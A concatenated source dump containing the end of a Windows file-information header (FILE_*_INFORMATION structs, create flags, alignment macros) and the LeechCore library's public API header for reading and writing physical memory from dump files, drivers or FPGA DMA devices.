typedef struct _FILE_STREAM_INFORMATION {
/**
 * The offset of the next FILE_STREAM_INFORMATION entry.
 * This member is zero if no other entries follow this one.
 * A consumer should verify a non-zero offset stays inside the buffer before following it.
 */
ULONG NextEntryOffset;
/**
 * Length, in bytes, of the StreamName string.
 */
ULONG StreamNameLength;
/**
 * Size, in bytes, of the stream.
 */
LARGE_INTEGER StreamSize;
/**
 * File stream allocation size, in bytes. Usually this value is a multiple of the sector
 * or cluster size of the underlying physical device.
 */
LARGE_INTEGER StreamAllocationSize;
/**
 * Unicode string that contains the name of the stream. Not guaranteed to be NUL-terminated; bound reads by StreamNameLength.
 */
WCHAR StreamName[1];
} FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION;
/**
 * \struct FILE_FS_LABEL_INFORMATION
 * \brief Used to set the label for a file system volume.
 *
 * The struct is requested during IRP_MJ_SET_VOLUME_INFORMATION query FileFsLabelInformation
 *
 * Variable-length: VolumeLabel is VolumeLabelLength bytes long and is caller-controlled input on the set path.
 */
typedef struct _FILE_FS_LABEL_INFORMATION {
/**
 * Length, in bytes, of the name for the volume.
 */
ULONG VolumeLabelLength;
/**
 * Name for the volume. Not guaranteed to be NUL-terminated; bound reads by VolumeLabelLength.
 */
WCHAR VolumeLabel[1];
} FILE_FS_LABEL_INFORMATION, *PFILE_FS_LABEL_INFORMATION;
/**
 * \struct FILE_FS_VOLUME_INFORMATION
 * \brief Used to query information about a volume on which a file system is mounted.
 *
 * The struct is requested during IRP_MJ_QUERY_VOLUME_INFORMATION query FileFsVolumeInformation
 *
 * Variable-length: VolumeLabel is VolumeLabelLength bytes long; sizeof() covers only its first WCHAR.
 */
typedef struct _FILE_FS_VOLUME_INFORMATION {
/**
 * Time when the volume was created.
 */
LARGE_INTEGER VolumeCreationTime;
/**
 * Serial number of the volume.
 */
ULONG VolumeSerialNumber;
/**
 * Length, in bytes, of the name of the volume.
 */
ULONG VolumeLabelLength;
/**
 * TRUE if the file system supports object-oriented file system objects, FALSE otherwise.
 */
BOOLEAN SupportsObjects;
/**
 * Name of the volume. Not guaranteed to be NUL-terminated; bound reads by VolumeLabelLength.
 */
WCHAR VolumeLabel[1];
} FILE_FS_VOLUME_INFORMATION, *PFILE_FS_VOLUME_INFORMATION;
/**
 * \struct FILE_FS_SIZE_INFORMATION
 * \brief Used to query sector and allocation-unit size information for a file system volume.
 *
 * The struct is requested during IRP_MJ_QUERY_VOLUME_INFORMATION query FileFsSizeInformation
 *
 * Volume byte sizes are derived as units * SectorsPerAllocationUnit * BytesPerSector; a consumer should do that
 * arithmetic in 64 bits.
 */
typedef struct _FILE_FS_SIZE_INFORMATION {
/**
 * Total number of allocation units on the volume that are available to the user associated with the calling thread.
 * If per-user quotas are in use, this value may be less than the total number of allocation units on the disk.
 */
LARGE_INTEGER TotalAllocationUnits;
/**
 * Total number of free allocation units on the volume that are available to the user associated with the calling thread.
 * If per-user quotas are in use, this value may be less than the total number of free allocation units on the disk.
 */
LARGE_INTEGER AvailableAllocationUnits;
/**
 * Number of sectors in each allocation unit.
 */
ULONG SectorsPerAllocationUnit;
/**
 * Number of bytes in each sector.
 */
ULONG BytesPerSector;
} FILE_FS_SIZE_INFORMATION, *PFILE_FS_SIZE_INFORMATION;
/**
 * \struct FILE_FS_FULL_SIZE_INFORMATION
 * \brief Used to query sector and allocation-unit size information for a file system volume.
 *
 * The struct is requested during IRP_MJ_QUERY_VOLUME_INFORMATION query FileFsFullSizeInformation
 *
 * Differs from FILE_FS_SIZE_INFORMATION by reporting both the quota-limited and the actual free space.
 */
typedef struct _FILE_FS_FULL_SIZE_INFORMATION {
/**
 * Total number of allocation units on the volume that are available to the user associated with the calling thread.
 * If per-user quotas are in use, this value may be less than the total number of allocation units on the disk.
 */
LARGE_INTEGER TotalAllocationUnits;
/**
 * Total number of free allocation units on the volume that are available to the user associated with the calling thread.
 * If per-user quotas are in use, this value may be less than the total number of free allocation units on the disk.
 */
LARGE_INTEGER CallerAvailableAllocationUnits;
/**
 * Total number of free allocation units on the volume, regardless of quota.
 */
LARGE_INTEGER ActualAvailableAllocationUnits;
/**
 * Number of sectors in each allocation unit.
 */
ULONG SectorsPerAllocationUnit;
/**
 * Number of bytes in each sector.
 */
ULONG BytesPerSector;
} FILE_FS_FULL_SIZE_INFORMATION, *PFILE_FS_FULL_SIZE_INFORMATION;
/**
 * \struct FILE_FS_ATTRIBUTE_INFORMATION
 * \brief Used to query attribute information for a file system.
 *
 * The struct is requested during IRP_MJ_QUERY_VOLUME_INFORMATION query FileFsAttributeInformation
 *
 * Variable-length: FileSystemName is FileSystemNameLength bytes long; sizeof() covers only its first WCHAR.
 */
typedef struct _FILE_FS_ATTRIBUTE_INFORMATION {
/**
 * Bitmask of flags specifying attributes of the specified file system.
 * \see https://msdn.microsoft.com/en-us/library/windows/hardware/ff540251(v=vs.85).aspx
 */
ULONG FileSystemAttributes;
/**
 * Maximum file name component length, in bytes, supported by the specified file system.
 * A file name component is that portion of a file name between backslashes.
 */
LONG MaximumComponentNameLength;
/**
 * Length, in bytes, of the file system name.
 */
ULONG FileSystemNameLength;
/**
 * File system name. Not guaranteed to be NUL-terminated; bound reads by FileSystemNameLength.
 */
WCHAR FileSystemName[1];
} FILE_FS_ATTRIBUTE_INFORMATION, *PFILE_FS_ATTRIBUTE_INFORMATION;
/**
 * \struct FILE_NETWORK_OPEN_INFORMATION
 * \brief Used as an argument to ZwQueryInformationFile.
 *
 * This is a per-file query class: the struct is requested during IRP_MJ_QUERY_INFORMATION with query FileNetworkOpenInformation
 * (not a volume-information query). It bundles the fields of FILE_BASIC_INFORMATION and FILE_STANDARD_INFORMATION that a
 * network redirector needs in one round trip.
 */
typedef struct _FILE_NETWORK_OPEN_INFORMATION {
/**
 * Specifies the time that the file was created.
 */
LARGE_INTEGER CreationTime;
/**
 * Specifies the time that the file was last accessed.
 */
LARGE_INTEGER LastAccessTime;
/**
 * Specifies the time that the file was last written to.
 */
LARGE_INTEGER LastWriteTime;
/**
 * Specifies the time that the file was last changed.
 */
LARGE_INTEGER ChangeTime;
/**
 * Specifies the file allocation size, in bytes. Usually,
 * this value is a multiple of the sector or cluster size of the underlying physical device.
 */
LARGE_INTEGER AllocationSize;
/**
 * Specifies the absolute end-of-file position as a byte offset from the start of the file.
 * EndOfFile specifies the byte offset to the end of the file. Because this value is zero-based,
 * it actually refers to the first free byte in the file. In other words,
 * EndOfFile is the offset to the byte immediately following the last valid byte in the file.
 */
LARGE_INTEGER EndOfFile;
/**
 * Specifies one or more FILE_ATTRIBUTE_XXX flags. For descriptions of these flags,
 * see the documentation of the GetFileAttributes function in the Microsoft Windows SDK.
 */
ULONG FileAttributes;
} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION;
/**
 * \struct FILE_NETWORK_PHYSICAL_NAME_INFORMATION
 * \brief Contains the full UNC physical pathname for a file or directory on a remote file share.
 *
 * This is a per-file query class: the struct is requested during IRP_MJ_QUERY_INFORMATION with query
 * FileNetworkPhysicalNameInformation (not a volume-information query).
 *
 * Variable-length: FileName is FileNameLength bytes long; sizeof() covers only its first WCHAR.
 */
typedef struct _FILE_NETWORK_PHYSICAL_NAME_INFORMATION {
/**
 * The length, in bytes, of the physical name in FileName.
 */
ULONG FileNameLength;
/**
 * The full UNC path of the network file share of the target. Not guaranteed to be NUL-terminated; bound reads by FileNameLength.
 */
WCHAR FileName[1];
} FILE_NETWORK_PHYSICAL_NAME_INFORMATION,
*PFILE_NETWORK_PHYSICAL_NAME_INFORMATION;
// IRP stack-location (SL_*) flags. NB! the numeric values overlap: 0x01,
// 0x02 and 0x04 are each defined twice below, so a flag's meaning depends on
// which request type it accompanies (presumably directory query vs. create -
// confirm against the WDK before reusing them across request types).
#define SL_RESTART_SCAN 0x01
#define SL_RETURN_SINGLE_ENTRY 0x02
#define SL_INDEX_SPECIFIED 0x04
#define SL_FORCE_ACCESS_CHECK 0x01
#define SL_OPEN_PAGING_FILE 0x02
#define SL_OPEN_TARGET_DIRECTORY 0x04
#define SL_CASE_SENSITIVE 0x80
// Alignment helpers. The mask form ~(sizeof(type) - 1) is only correct when
// sizeof(type) is a power of two (true for the WORD/LONG/ULONGLONG users below).
// NB! ALIGN_DOWN/ALIGN_UP cast the length to ULONG (32-bit) - lengths above
// 4 GiB are truncated; the *_POINTER variants use ULONG_PTR and are safe
// for full-width addresses.
#define ALIGN_DOWN(length, type) ((ULONG)(length) & ~(sizeof(type) - 1))
#define ALIGN_UP(length, type) \
(ALIGN_DOWN(((ULONG)(length) + sizeof(type) - 1), type))
#define ALIGN_DOWN_POINTER(address, type) \
((PVOID)((ULONG_PTR)(address) & ~((ULONG_PTR)sizeof(type) - 1)))
#define ALIGN_UP_POINTER(address, type) \
(ALIGN_DOWN_POINTER(((ULONG_PTR)(address) + sizeof(type) - 1), type))
#define WordAlign(Val) (ALIGN_UP(Val, WORD))
#define WordAlignPtr(Ptr) (ALIGN_UP_POINTER(Ptr, WORD))
#define LongAlign(Val) (ALIGN_UP(Val, LONG))
#define LongAlignPtr(Ptr) (ALIGN_UP_POINTER(Ptr, LONG))
#define QuadAlign(Val) (ALIGN_UP(Val, ULONGLONG))
#define QuadAlignPtr(Ptr) (ALIGN_UP_POINTER(Ptr, ULONGLONG))
#define IsPtrQuadAligned(Ptr) (QuadAlignPtr(Ptr) == (PVOID)(Ptr))
// from wdm.h
// Create disposition values (mutually exclusive, not flags).
#define FILE_SUPERSEDE 0x00000000
#define FILE_OPEN 0x00000001
#define FILE_CREATE 0x00000002
#define FILE_OPEN_IF 0x00000003
#define FILE_OVERWRITE 0x00000004
#define FILE_OVERWRITE_IF 0x00000005
#define FILE_MAXIMUM_DISPOSITION 0x00000005
// Create option flags (bit flags, may be combined). Their values overlap
// with the disposition values above by design - they live in a different field.
#define FILE_DIRECTORY_FILE 0x00000001
#define FILE_WRITE_THROUGH 0x00000002
#define FILE_SEQUENTIAL_ONLY 0x00000004
#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008
#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010
#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
#define FILE_NON_DIRECTORY_FILE 0x00000040
#define FILE_CREATE_TREE_CONNECTION 0x00000080
#define FILE_COMPLETE_IF_OPLOCKED 0x00000100
#define FILE_NO_EA_KNOWLEDGE 0x00000200
#define FILE_OPEN_REMOTE_INSTANCE 0x00000400
#define FILE_RANDOM_ACCESS 0x00000800
#define FILE_DELETE_ON_CLOSE 0x00001000
#define FILE_OPEN_BY_FILE_ID 0x00002000
#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000
#define FILE_NO_COMPRESSION 0x00008000
#if (_WIN32_WINNT >= _WIN32_WINNT_WIN7)
#define FILE_OPEN_REQUIRING_OPLOCK 0x00010000
#define FILE_DISALLOW_EXCLUSIVE 0x00020000
#endif /* _WIN32_WINNT >= _WIN32_WINNT_WIN7 */
#if (_WIN32_WINNT >= _WIN32_WINNT_WIN8)
#define FILE_SESSION_AWARE 0x00040000
#endif /* _WIN32_WINNT >= _WIN32_WINNT_WIN8 */
#define FILE_RESERVE_OPFILTER 0x00100000
#define FILE_OPEN_REPARSE_POINT 0x00200000
#define FILE_OPEN_NO_RECALL 0x00400000
#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000
// Mask of all option bits a caller may set (bits above 0x00ffffff are rejected).
#define FILE_VALID_OPTION_FLAGS 0x00ffffff
// Create result codes (reported back after a create/open completes).
#define FILE_SUPERSEDED 0x00000000
#define FILE_OPENED 0x00000001
#define FILE_CREATED 0x00000002
#define FILE_OVERWRITTEN 0x00000003
#define FILE_EXISTS 0x00000004
#define FILE_DOES_NOT_EXIST 0x00000005
// Special byte-offset sentinels for write requests (never real offsets).
#define FILE_WRITE_TO_END_OF_FILE 0xffffffff
#define FILE_USE_FILE_POINTER_POSITION 0xfffffffe
/**
* \struct UNICODE_STRING
* \brief Structure is used to define Unicode strings.
*
* Both lengths are byte counts (2 bytes per WCHAR), not character counts.
*/
typedef struct _UNICODE_STRING {
/**
* The length, in bytes, of the string stored in Buffer.
* NOTE(review): Buffer is not guaranteed to be NUL-terminated - always
* bound string handling by Length rather than scanning for a terminator.
*/
USHORT Length;
/**
* The length, in bytes, of Buffer. Must be >= Length.
*/
USHORT MaximumLength;
/**
* Pointer to a buffer used to contain a string of wide characters.
*/
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
#endif // FILEINFO_H_
================================================
FILE: includes/leechcore.h
================================================
// leechcore.h : external header of the LeechCore library.
//
// LeechCore is a library which abstracts away reading and writing to various
// software and hardware acquisition sources. Sources ranges from memory dump
// files to driver backed live memory to hardware (FPGA) DMA backed memory.
//
// LeechCore built-in device support may be extended with external plugin
// device drivers placed as .dll or .so files in the same folder as LeechCore.
//
// For more information please consult the LeechCore information on Github:
// - README: https://github.com/ufrisk/LeechCore
// - GUIDE: https://github.com/ufrisk/LeechCore/wiki
//
// (c) Ulf Frisk, 2020-2026
// Author: Ulf Frisk, pcileech@frizk.net
//
// Header Version: 2.20.0
//
#ifndef __LEECHCORE_H__
#define __LEECHCORE_H__
#ifdef __cplusplus
extern "C" {
#endif /* __cplusplus */
//-----------------------------------------------------------------------------
// OS COMPATIBILITY BELOW:
// On Windows the native SDK types are used. On Linux/macOS a minimal subset of
// the Windows type names is re-created on top of <inttypes.h> so the ABI of
// the structs in this header stays the same across platforms.
//-----------------------------------------------------------------------------
#ifdef _WIN32
#include <Windows.h>
#define EXPORTED_FUNCTION __declspec(dllexport)
typedef unsigned __int64 QWORD, *PQWORD;
#endif /* _WIN32 */
#if defined(LINUX) || defined(MACOS)
#include <inttypes.h>
#include <stdlib.h>
#define EXPORTED_FUNCTION __attribute__((visibility("default")))
typedef void VOID, *PVOID, *HANDLE, **PHANDLE, *HMODULE;
typedef long long unsigned int QWORD, *PQWORD, ULONG64, *PULONG64;
typedef size_t SIZE_T, *PSIZE_T;
typedef uint64_t FILETIME, *PFILETIME;      // plain 64-bit value, not the Windows two-DWORD struct
typedef uint32_t DWORD, *PDWORD, *LPDWORD, BOOL, *PBOOL, NTSTATUS;    // BOOL is 32-bit unsigned here
typedef uint16_t WORD, *PWORD;
typedef uint8_t BYTE, *PBYTE, *LPBYTE, UCHAR;
typedef char CHAR, *PCHAR, *LPSTR;
typedef const char *LPCSTR;
typedef uint16_t WCHAR, *PWCHAR, *LPWSTR;   // 16-bit, NOT the platform wchar_t (32-bit on Linux)
typedef const uint16_t *LPCWSTR;
#define MAX_PATH 260
// SAL annotations are documentation only on non-Windows builds and expand to nothing.
#define _In_
#define _In_z_
#define _In_opt_
#define _In_reads_(x)
#define _In_reads_bytes_(x)
#define _In_reads_bytes_opt_(x)
#define _In_reads_opt_(x)
#define _Inout_
#define _Inout_bytecount_(x)
#define _Inout_opt_
#define _Inout_updates_opt_(x)
#define _Out_
#define _Out_opt_
#define _Out_writes_(x)
#define _Out_writes_bytes_opt_(x)
#define _Out_writes_opt_(x)
#define _Out_writes_to_(x,y)
#define _When_(x,y)
#define _Frees_ptr_opt_
#define _Post_ptr_invalid_
#define _Check_return_opt_
#define _Printf_format_string_
#define _Success_(x)
#endif /* LINUX || MACOS */
//-----------------------------------------------------------------------------
// Create and Close LeechCore devices:
// It's possible to create multiple LeechCore devices in parallel and also of
// different types if the underlying device will allow this. LeechCore will
// automatically take care of and abstract away any hardware/software issues
// with regards to the underlying devices.
//
// For more information about supported devices please check out the LeechCore
// guide at: https://github.com/ufrisk/LeechCore/wiki
//-----------------------------------------------------------------------------
// Struct version magics: the caller stores these in the dwVersion field of the
// corresponding struct so LeechCore can reject mismatched struct layouts.
#define LC_CONFIG_VERSION 0xc0fd0002
#define LC_CONFIG_ERRORINFO_VERSION 0xc0fe0002
// Bit flags for LC_CONFIG.dwPrintfVerbosity (may be OR:ed together).
#define LC_CONFIG_PRINTF_ENABLED 0x01
#define LC_CONFIG_PRINTF_V 0x02
#define LC_CONFIG_PRINTF_VV 0x04
#define LC_CONFIG_PRINTF_VVV 0x08
/*
* Device configuration passed to LcCreate() / LcCreateEx().
* The caller fills in the first group of fields; LeechCore fills in the rest.
*/
typedef struct LC_CONFIG {
// below are set by caller
DWORD dwVersion; // must equal LC_CONFIG_VERSION
DWORD dwPrintfVerbosity; // printf verbosity according to LC_CONFIG_PRINTF_*
CHAR szDevice[MAX_PATH]; // device configuration - see wiki for additional info. (NUL-terminated, MAX_PATH incl. terminator)
CHAR szRemote[MAX_PATH]; // remote configuration - see wiki for additional info. (NUL-terminated, MAX_PATH incl. terminator)
_Check_return_opt_ int(*pfn_printf_opt)(_In_z_ _Printf_format_string_ char const *const _Format, ...); // optional printf replacement; NULL = default
// below are set by caller, updated by LeechCore
QWORD paMax; // max physical address (disables any max address auto-detect).
// below are set by LeechCore
BOOL fVolatile; // memory may change between reads (live source).
BOOL fWritable; // device supports LcWrite / LcWriteScatter.
BOOL fRemote; // device is accessed through a remote LeechAgent.
BOOL fRemoteDisableCompress;
CHAR szDeviceName[MAX_PATH]; // device name - such as 'fpga' or 'file'.
} LC_CONFIG, *PLC_CONFIG;
/*
* Error information optionally returned by LcCreateEx() on failure.
* Allocated by LeechCore; must be released with LcMemFree().
*/
typedef struct tdLC_CONFIG_ERRORINFO {
DWORD dwVersion; // must equal LC_CONFIG_ERRORINFO_VERSION
DWORD cbStruct; // total size in bytes, presumably including the trailing wszUserText - confirm
DWORD _FutureUse[16];
BOOL fUserInputRequest; // TRUE = wszUserText asks the user for an action.
DWORD cwszUserText; // NOTE(review): looks like a WCHAR count of wszUserText - verify against LeechCore.
WCHAR wszUserText[]; // flexible array member, sized by cwszUserText.
} LC_CONFIG_ERRORINFO, *PLC_CONFIG_ERRORINFO, **PPLC_CONFIG_ERRORINFO;
/*
* Create a new LeechCore device according to the supplied configuration.
* LcCreate() is the plain form; LcCreateEx() additionally returns error
* information on failure.
* CALLER LcMemFree: ppLcCreateErrorInfo (LcCreateEx only)
* -- pLcCreateConfig = configuration; caller-set fields are read and the
* LeechCore-set fields are updated on success.
* -- ppLcCreateErrorInfo = ptr to receive function allocated struct with error
* information upon function failure. This info may contain a user message
* requesting user action as an example. Any returned struct should be
* free'd by a call to LcMemFree().
* -- return = device handle, or NULL on failure.
*/
EXPORTED_FUNCTION _Success_(return != NULL)
HANDLE LcCreate(
_Inout_ PLC_CONFIG pLcCreateConfig
);
EXPORTED_FUNCTION _Success_(return != NULL)
HANDLE LcCreateEx(
_Inout_ PLC_CONFIG pLcCreateConfig,
_Out_opt_ PPLC_CONFIG_ERRORINFO ppLcCreateErrorInfo
);
/*
* Close a LeechCore handle and free any resources no longer needed.
* -- hLC = handle from LcCreate()/LcCreateEx(); NULL is accepted and the
* handle must not be used after this call.
*/
EXPORTED_FUNCTION
VOID LcClose(
_In_opt_ _Post_ptr_invalid_ HANDLE hLC
);
//-----------------------------------------------------------------------------
// Read and Write memory from underlying device either using contiguous method
// or more recommended scatter method.
//
// The MEM_SCATTER struct allows reading and writing of discontiguous memory
// chunks which must adhere to the following rules:
// - maximum size = 0x1000 (4096) bytes = recommended size.
// - minimum size = 2 DWORDs (8 bytes).
// - must be DWORD (4 byte) aligned.
// - must never cross 0x1000 page boundary.
// - max value of iStack = MEM_SCATTER_STACK_SIZE - 2.
//-----------------------------------------------------------------------------
#define MEM_SCATTER_VERSION 0xc0fe0002
#define MEM_SCATTER_STACK_SIZE 12
/*
* One scatter element: a single page-bounded read or write request.
* See the rules in the section comment above for size/alignment limits.
*/
typedef struct tdMEM_SCATTER {
DWORD version; // MEM_SCATTER_VERSION
BOOL f; // TRUE = success data in pb, FALSE = fail or not yet read.
QWORD qwA; // address of memory to read
union {
PBYTE pb; // buffer to hold memory contents
QWORD _Filler; // keeps the union 8 bytes wide on 32-bit builds.
};
DWORD cb; // size of buffer to hold memory contents.
DWORD iStack; // internal stack pointer
QWORD vStack[MEM_SCATTER_STACK_SIZE]; // internal stack
} MEM_SCATTER, *PMEM_SCATTER, **PPMEM_SCATTER;
// Helper macros. NB! the pMEM argument is not parenthesized, so pass a plain
// pointer expression. The stack macros perform no bounds check on iStack;
// callers must respect the "max iStack = MEM_SCATTER_STACK_SIZE - 2" rule.
#define MEM_SCATTER_ADDR_INVALID ((QWORD)-1)
#define MEM_SCATTER_ADDR_ISINVALID(pMEM) (pMEM->qwA == (QWORD)-1)
#define MEM_SCATTER_ADDR_ISVALID(pMEM) (pMEM->qwA != (QWORD)-1)
#define MEM_SCATTER_STACK_PUSH(pMEM, v) (pMEM->vStack[pMEM->iStack++] = (QWORD)(v))
#define MEM_SCATTER_STACK_PEEK(pMEM, i) (pMEM->vStack[pMEM->iStack - i])
#define MEM_SCATTER_STACK_SET(pMEM, i, v) (pMEM->vStack[pMEM->iStack - i] = (QWORD)(v))
#define MEM_SCATTER_STACK_ADD(pMEM, i, v) (pMEM->vStack[pMEM->iStack - i] += (QWORD)(v))
#define MEM_SCATTER_STACK_POP(pMEM) (pMEM->vStack[--pMEM->iStack])
/*
* Free LeechCore allocated memory such as memory allocated by the
* LcAllocScatter / LcCommand functions.
* -- pv = LeechCore-allocated pointer; NULL is accepted (no-op).
*/
EXPORTED_FUNCTION
VOID LcMemFree(
_Frees_ptr_opt_ PVOID pv
);
/*
* Allocate and pre-initialize empty MEMs including a 0x1000 buffer for each
* pMEM. The result should be freed by LcMemFree when its no longer needed.
* The 0x1000-sized per-MEM memory buffers are contiguous between MEMs in order.
* CALLER LcMemFree: *pppMEMs
* -- cMEMs = number of MEMs to allocate
* -- pppMEMs = pointer to receive ppMEMs
* -- return
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcAllocScatter1(
_In_ DWORD cMEMs,
_Out_ PPMEM_SCATTER *pppMEMs
);
/*
* Allocate and pre-initialize empty MEMs excluding the 0x1000 buffer which
* will be accounted towards the pbData buffer in a contiguous way.
* The result should be freed by LcMemFree when its no longer needed.
* CALLER LcMemFree: *pppMEMs
* -- cbData = size of pbData (must be cMEMs * 0x1000)
* -- pbData = buffer used for MEM.pb (caller-owned; must outlive the MEMs)
* -- cMEMs
* -- pppMEMs = pointer to receive ppMEMs
* -- return
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcAllocScatter2(
_In_ DWORD cbData,
_Inout_updates_opt_(cbData) PBYTE pbData,
_In_ DWORD cMEMs,
_Out_ PPMEM_SCATTER *pppMEMs
);
/*
* Allocate and pre-initialize empty MEMs excluding the 0x1000 buffer which
* will be accounted towards the pbData buffer in a contiguous way.
* NOTE(review): presumably freed with LcMemFree like LcAllocScatter1/2 - confirm.
* -- pbDataFirstPage = optional buffer of first page (0x1000 bytes)
* -- pbDataLastPage = optional buffer of last page (0x1000 bytes)
* -- cbData = size of pbData
* -- pbData = buffer used for MEM.pb except first/last if exists
* -- cMEMs
* -- pppMEMs = pointer to receive ppMEMs
* -- return
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcAllocScatter3(
_Inout_updates_opt_(0x1000) PBYTE pbDataFirstPage,
_Inout_updates_opt_(0x1000) PBYTE pbDataLastPage,
_In_ DWORD cbData,
_Inout_updates_opt_(cbData) PBYTE pbData,
_In_ DWORD cMEMs,
_Out_ PPMEM_SCATTER *pppMEMs
);
/*
* Read memory in a scattered non-contiguous way. This is recommended for reads.
* There is no aggregate return value: check each MEM's f flag (TRUE = pb holds
* valid data) after the call.
* -- hLC
* -- cMEMs
* -- ppMEMs
*/
EXPORTED_FUNCTION
VOID LcReadScatter(
_In_ HANDLE hLC,
_In_ DWORD cMEMs,
_Inout_ PPMEM_SCATTER ppMEMs
);
/*
* Read memory in a contiguous way. Note that if multiple memory segments are
* to be read LcReadScatter() may be more efficient.
* -- hLC,
* -- pa = physical address to read from
* -- cb = number of bytes to read
* -- pb = caller buffer of at least cb bytes
* -- return
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcRead(
_In_ HANDLE hLC,
_In_ QWORD pa,
_In_ DWORD cb,
_Out_writes_(cb) PBYTE pb
);
/*
* Write memory in a scattered non-contiguous way.
* Requires a writable device (LC_CONFIG.fWritable); per-MEM outcome is
* reported in each MEM's f flag.
* -- hLC
* -- cMEMs
* -- ppMEMs
*/
EXPORTED_FUNCTION
VOID LcWriteScatter(
_In_ HANDLE hLC,
_In_ DWORD cMEMs,
_Inout_ PPMEM_SCATTER ppMEMs
);
/*
* Write memory in a contiguous way.
* Requires a writable device (LC_CONFIG.fWritable).
* -- hLC
* -- pa = physical address to write to
* -- cb = number of bytes to write
* -- pb = source buffer of cb bytes
* -- return
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcWrite(
_In_ HANDLE hLC,
_In_ QWORD pa,
_In_ DWORD cb,
_In_reads_(cb) PBYTE pb
);
//-----------------------------------------------------------------------------
// Get/Set/Command functionality may be used to query and/or update LeechCore
// or its devices in various ways.
//-----------------------------------------------------------------------------
/*
* Get an option as defined by LC_OPT_*. (R option).
* -- hLC
* -- fOption = LC_OPT_* (the low dword may carry a sub-argument for some options)
* -- pqwValue = ptr to receive the option value
* -- return
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcGetOption(
_In_ HANDLE hLC,
_In_ QWORD fOption,
_Out_ PQWORD pqwValue
);
/*
* Set an option as defined by LC_OPT_*. (W option).
* -- hLC
* -- fOption = LC_OPT_* (the low dword may carry a sub-argument for some options)
* -- qwValue = value to set
* -- return
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcSetOption(
_In_ HANDLE hLC,
_In_ QWORD fOption,
_In_ QWORD qwValue
);
/*
* Execute a command and retrieve a result (if any) at the same time.
* NB! If *ppbDataOut contains a memory allocation on exit this should be free'd
* by calling LcMemFree().
* CALLER LcMemFree: *ppbDataOut
* -- hLC
* -- fCommand = LC_CMD_* (the low dword may carry a sub-argument for some commands)
* -- cbDataIn
* -- pbDataIn = optional input; for the LC_CMD_*_CONTEXT / *_CALLBACK
* commands this is the raw pointer/function value itself.
* -- ppbDataOut = optional ptr to receive a LeechCore-allocated result buffer
* -- pcbDataOut = optional ptr to receive the size of *ppbDataOut
* -- return
*/
EXPORTED_FUNCTION _Success_(return)
BOOL LcCommand(
_In_ HANDLE hLC,
_In_ QWORD fCommand,
_In_ DWORD cbDataIn,
_In_reads_opt_(cbDataIn) PBYTE pbDataIn,
_Out_opt_ PBYTE *ppbDataOut,
_Out_opt_ PDWORD pcbDataOut
);
// Options for LcGetOption / LcSetOption. The trailing comment gives the access
// mode (R = get only, RW = get and set). Where "[lo-dword: ...]" is noted the
// low 32 bits of the option value carry an argument and must be OR:ed in.
#define LC_OPT_CORE_PRINTF_ENABLE 0x4000000100000000 // RW
#define LC_OPT_CORE_VERBOSE 0x4000000200000000 // RW
#define LC_OPT_CORE_VERBOSE_EXTRA 0x4000000300000000 // RW
#define LC_OPT_CORE_VERBOSE_EXTRA_TLP 0x4000000400000000 // RW
#define LC_OPT_CORE_VERSION_MAJOR 0x4000000500000000 // R
#define LC_OPT_CORE_VERSION_MINOR 0x4000000600000000 // R
#define LC_OPT_CORE_VERSION_REVISION 0x4000000700000000 // R
#define LC_OPT_CORE_ADDR_MAX 0x1000000800000000 // R
#define LC_OPT_CORE_STATISTICS_CALL_COUNT 0x4000000900000000 // R [lo-dword: LC_STATISTICS_ID_*]
#define LC_OPT_CORE_STATISTICS_CALL_TIME 0x4000000a00000000 // R [lo-dword: LC_STATISTICS_ID_*]
#define LC_OPT_CORE_VOLATILE 0x1000000b00000000 // R
#define LC_OPT_CORE_READONLY 0x1000000c00000000 // R
// Memory-info options: values describing the acquired memory image / target OS.
#define LC_OPT_MEMORYINFO_VALID 0x0200000100000000 // R
#define LC_OPT_MEMORYINFO_FLAG_32BIT 0x0200000300000000 // R
#define LC_OPT_MEMORYINFO_FLAG_PAE 0x0200000400000000 // R
#define LC_OPT_MEMORYINFO_ARCH 0x0200001200000000 // R - LC_ARCH_TP
#define LC_OPT_MEMORYINFO_OS_VERSION_MINOR 0x0200000500000000 // R
#define LC_OPT_MEMORYINFO_OS_VERSION_MAJOR 0x0200000600000000 // R
#define LC_OPT_MEMORYINFO_OS_DTB 0x0200000700000000 // R
#define LC_OPT_MEMORYINFO_OS_PFN 0x0200000800000000 // R
#define LC_OPT_MEMORYINFO_OS_PsLoadedModuleList 0x0200000900000000 // R
#define LC_OPT_MEMORYINFO_OS_PsActiveProcessHead 0x0200000a00000000 // R
#define LC_OPT_MEMORYINFO_OS_MACHINE_IMAGE_TP 0x0200000b00000000 // R
#define LC_OPT_MEMORYINFO_OS_NUM_PROCESSORS 0x0200000c00000000 // R
#define LC_OPT_MEMORYINFO_OS_SYSTEMTIME 0x0200000d00000000 // R
#define LC_OPT_MEMORYINFO_OS_UPTIME 0x0200000e00000000 // R
#define LC_OPT_MEMORYINFO_OS_KERNELBASE 0x0200000f00000000 // R
#define LC_OPT_MEMORYINFO_OS_KERNELHINT 0x0200001000000000 // R
#define LC_OPT_MEMORYINFO_OS_KdDebuggerDataBlock 0x0200001100000000 // R
// FPGA device options (only meaningful when the underlying device is 'fpga').
#define LC_OPT_FPGA_PROBE_MAXPAGES 0x0300000100000000 // RW
#define LC_OPT_FPGA_MAX_SIZE_RX 0x0300000300000000 // RW
#define LC_OPT_FPGA_MAX_SIZE_TX 0x0300000400000000 // RW
#define LC_OPT_FPGA_DELAY_PROBE_READ 0x0300000500000000 // RW - uS
#define LC_OPT_FPGA_DELAY_PROBE_WRITE 0x0300000600000000 // RW - uS
#define LC_OPT_FPGA_DELAY_WRITE 0x0300000700000000 // RW - uS
#define LC_OPT_FPGA_DELAY_READ 0x0300000800000000 // RW - uS
#define LC_OPT_FPGA_RETRY_ON_ERROR 0x0300000900000000 // RW
